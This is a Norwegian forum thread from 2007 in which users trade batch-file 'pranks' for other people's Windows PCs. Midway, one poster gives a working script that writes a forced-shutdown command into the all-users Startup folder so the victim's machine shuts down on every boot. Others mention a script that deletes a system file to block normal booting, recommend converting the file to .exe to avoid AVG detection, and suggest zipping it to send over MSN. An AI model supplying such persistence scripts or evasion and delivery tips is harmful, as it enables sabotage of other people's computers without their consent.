WheelMan Skrevet 28. november 2007 Del Skrevet 28. november 2007 han fikk det ikke til :!: Her er en kul en: shutdown -s -t 10 -c "omg, your computerz got teh viruz!" Kult. Jeg har alltid en Shutdown -A på skrivebordet jeg. Jeg hadde en for å få ut cd romme før.. Hva med å legge inn shutdown -s -t 10 -c "omg, your computerz got teh viruz!" i oppstartsmappa til windows? Eller enda bedre, legge den som Min Datamaskin på skrivebordet i tilleg , som snarvei, personen er dømt til og trykke på den en gang :!: Lenke til kommentar
aklla Skrevet 28. november 2007 Del Skrevet 28. november 2007 fikk en idè om ett virkelig slemt script. Hvor slem vil du være mot han du tuller med? det jeg tenkte på var å lage ett script som lager ett annet script, som legger seg i oppstarts-mappa og slår av maskinen etter f.eks 10 sec når han restarter den, hver gang han restarter den Lenke til kommentar
WheelMan Skrevet 28. november 2007 Del Skrevet 28. november 2007 fikk en idè om ett virkelig slemt script.Hvor slem vil du være mot han du tuller med? det jeg tenkte på var å lage ett script som lager ett annet script, som legger seg i oppstarts-mappa og slår av maskinen etter f.eks 10 sec når han restarter den, hver gang han restarter den Jeg har det på en CD, i tilleg til at sciptet fjerner en Systemfil som gjør at du ikke får boota vanlig windows, bare sikkermodus , også var det noe annet rart den gjorde. Lenke til kommentar
Kakebakelate Skrevet 28. november 2007 Del Skrevet 28. november 2007 fikk en idè om ett virkelig slemt script.Hvor slem vil du være mot han du tuller med? det jeg tenkte på var å lage ett script som lager ett annet script, som legger seg i oppstarts-mappa og slår av maskinen etter f.eks 10 sec når han restarter den, hver gang han restarter den Jeg har det på en CD, i tilleg til at sciptet fjerner en Systemfil som gjør at du ikke får boota vanlig windows, bare sikkermodus , også var det noe annet rart den gjorde. Den er slem! Lenke til kommentar
WheelMan Skrevet 28. november 2007 Del Skrevet 28. november 2007 fikk en idè om ett virkelig slemt script.Hvor slem vil du være mot han du tuller med? det jeg tenkte på var å lage ett script som lager ett annet script, som legger seg i oppstarts-mappa og slår av maskinen etter f.eks 10 sec når han restarter den, hver gang han restarter den Jeg har det på en CD, i tilleg til at sciptet fjerner en Systemfil som gjør at du ikke får boota vanlig windows, bare sikkermodus , også var det noe annet rart den gjorde. Den er slem! Neida, er så koselig atte NB: Brukes kun på folk som har fucka med PC-en min, som skjer rimelig ofte Lenke til kommentar
hernil Skrevet 28. november 2007 Del Skrevet 28. november 2007 (endret) fikk en idè om ett virkelig slemt script.Hvor slem vil du være mot han du tuller med? det jeg tenkte på var å lage ett script som lager ett annet script, som legger seg i oppstarts-mappa og slår av maskinen etter f.eks 10 sec når han restarter den, hver gang han restarter den en sånn en? @echo off FOR /F "tokens=3* delims= " %%A in ('REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"') do SET startup=%%B set av="%startup%\system.bat"" echo shutdown -s -t 10 -c "Hehe..." -f >> %av% 10 sek er forresten nok til å trykke windowstast+r shutdown -a er bedre å gjøre det til 2 sek slette systemfiler er bare slemt. den her er ikke så vanskelig å kvitte seg med hvis man har litt peiling. Endret 28. november 2007 av hernil Lenke til kommentar
WheelMan Skrevet 28. november 2007 Del Skrevet 28. november 2007 slette systemfiler er bare slemt. den her er ikke så vanskelig å kvitte seg med hvis man har litt peiling. hehe, ja :!: Lenke til kommentar
morgan_kane Skrevet 28. november 2007 Forfatter Del Skrevet 28. november 2007 hvordan blir det med det scriptet. skal jeg bare hive det inn i et .txt fil og gjøre det om til .bat eller blir det meir vanskelig. blir jo litt problemer å få .bat filen på hans pc siden avg oppdager det... Lenke til kommentar
WheelMan Skrevet 28. november 2007 Del Skrevet 28. november 2007 hvordan blir det med det scriptet. skal jeg bare hive det inn i et .txt fil og gjøre det om til .bat eller blir det meir vanskelig. blir jo litt problemer å få .bat filen på hans pc siden avg oppdager det... prøv og gjør fila om til .exe, finn et program , da blir det kos =D Lenke til kommentar
pumazz Skrevet 1. desember 2007 Del Skrevet 1. desember 2007 Hei. Lurer på en ting... er det en bat komando som gjør at det kommer en melding/pop.up på skjermen uten at den går inn på en html side? Lenke til kommentar
1915 Skrevet 1. desember 2007 Del Skrevet 1. desember 2007 hvordan kan jeg sende en .bat fil over msn? det står at jeg ikke har tilatelse til å åpne den når jeg skal sende den... lag det til en rar fil med winrar eller en zip fil. rar er enklest;P Lenke til kommentar
hernil Skrevet 2. desember 2007 Del Skrevet 2. desember 2007 Hei. Lurer på en ting... er det en bat komando som gjør at det kommer en melding/pop.up på skjermen uten at den går inn på en html side? msg * "din melding" Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå